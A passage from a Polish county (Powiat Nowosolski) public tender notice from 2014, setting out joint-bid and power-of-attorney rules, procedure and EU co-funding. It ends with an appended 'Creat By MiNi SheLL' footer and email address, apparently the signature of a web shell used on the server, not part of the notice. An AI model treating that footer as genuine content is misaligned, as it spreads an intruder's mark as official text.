7) pozostałe oświadczenia i dokumenty, o których mowa w ust. 7 SIWZ.
Uwaga:
Zamawiającemu przysługuje prawo do żądania przedstawienia oryginału dokumentu lub jego kopii
poświadczonej notarialnie w sytuacji, gdy złożona przez Wykonawcę kopia dokumentu jest
nieczytelna lub budzi wątpliwości co do jej autentyczności.
Oferty wspólne:
Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art.22 ust.1 ustawy pzp polega
na zasobach innych podmiotów, na zasadach określonych w art.26 ust.2b ustawy pzp, a podmioty te będą
brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych
podmiotów dokumentów dotyczących tego podmiotu w zakresie wymaganym dla Wykonawcy.Oferta przedstawiona przez dwóch lub więcej wykonawców musi być przedstawiona jako jedna oferta od
jednego podmiotu i spełniać następujące wymagania:
1) Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w
postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia
umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy przedłożyć wraz z ofertą.
Udzielone pełnomocnictwo musi zawierać:
a. postępowanie o zamówienie publiczne, którego ono dotyczy,
b. nazwy wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wraz z
określeniem adresu ich siedziby, nazwę i adres ustanowionego Wykonawcy- Pełnomocnika,
zakres umocowania pełnomocnictwa,
c. dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających
się wspólnie o udzielenie zamówienia, w tym przez Wykonawcę - Pełnomocnika. Podpisy muszą
być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym
rejestrze lub wpisie do centralnej ewidencji i informacji o działalności gospodarczej
Wykonawców składających wspólną ofertę. Do oferty należy załączyć oryginał pełnomocnictwa
lub urzędowo poświadczony odpis pełnomocnictwa.
d. wszelka korespondencja dokonywana będzie wyłącznie z pełnomocnikiem;
2) w przypadku wyboru jako najkorzystniejszej oferty Wykonawców wspólnie ubiegających się o
udzielenie zamówienia, Zamawiający oświadcza, że może żądać przed zawarciem umowy w sprawie
zamówienia publicznego, umowy regulującej współpracę tych wykonawców;
3) wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie
umowy;
4) każdy z wykonawców składających ofertę wspólną musi złożyć dokumenty, o których mowa w
ust.7 pkt 3. Pozostałe dokumenty traktowane będą jako wspólne;
5) wypełniając formularz oferty - załącznik nr 1 oraz inne dokumenty powołujące się na Wykonawcę w
miejscu np. nazwa i adres wykonawcy należy wpisać dane dotyczące wszystkich Wykonawców
ubiegających się wspólnie;
5.3. Wszelka korespondencja dokonywana będzie wyłącznie z podmiotem występującym jako
reprezentant pozostałych (pełnomocnikiem).
5.4.Spółka cywilna, jest kwalifikowana jako wykonawcy wspólnie ubiegający się o udzielenie
zamówienia, dlatego jej wspólnicy zobowiązani są ustanowić pełnomocnika do reprezentowania w
postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo musi być
załączone do oferty. Ponadto, każdy ze wspólników spółki cywilnej zobowiązany jest załączyć
dokumenty wymienione w ust.7 pkt 3 SIWZ . Oferta składana przez spółkę cywilną poza wyżej
wymienionymi dokumentami winna dodatkowo zawierać umowę spółki cywilnej - jeżeli oferta nie jest
podpisywana przez wszystkich wspólników tworzących spółkę.
5.5.Zgodnie z przepisami art. 24 ust. 2 pkt 3 ustawy pzp Zamawiający wykluczy z postępowania
wykonawcę, jeżeli stwierdzi, że przedłożone przez niego informacje mające wpływ na wynik
postępowania są nieprawdziwe.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-nowosolski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe, 67-100 Nowa Sól, ul. Moniuszki 3b, pok.201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2014 godzina 09:00, miejsce: Powiat Nowosolski z siedzibą Starostwa Powiatowego,
Ul. Moniuszki 3b, 67-100 Nowa Sól,
Sekretariat - I piętro - pok.109.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju
Regionalnego w ramach Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com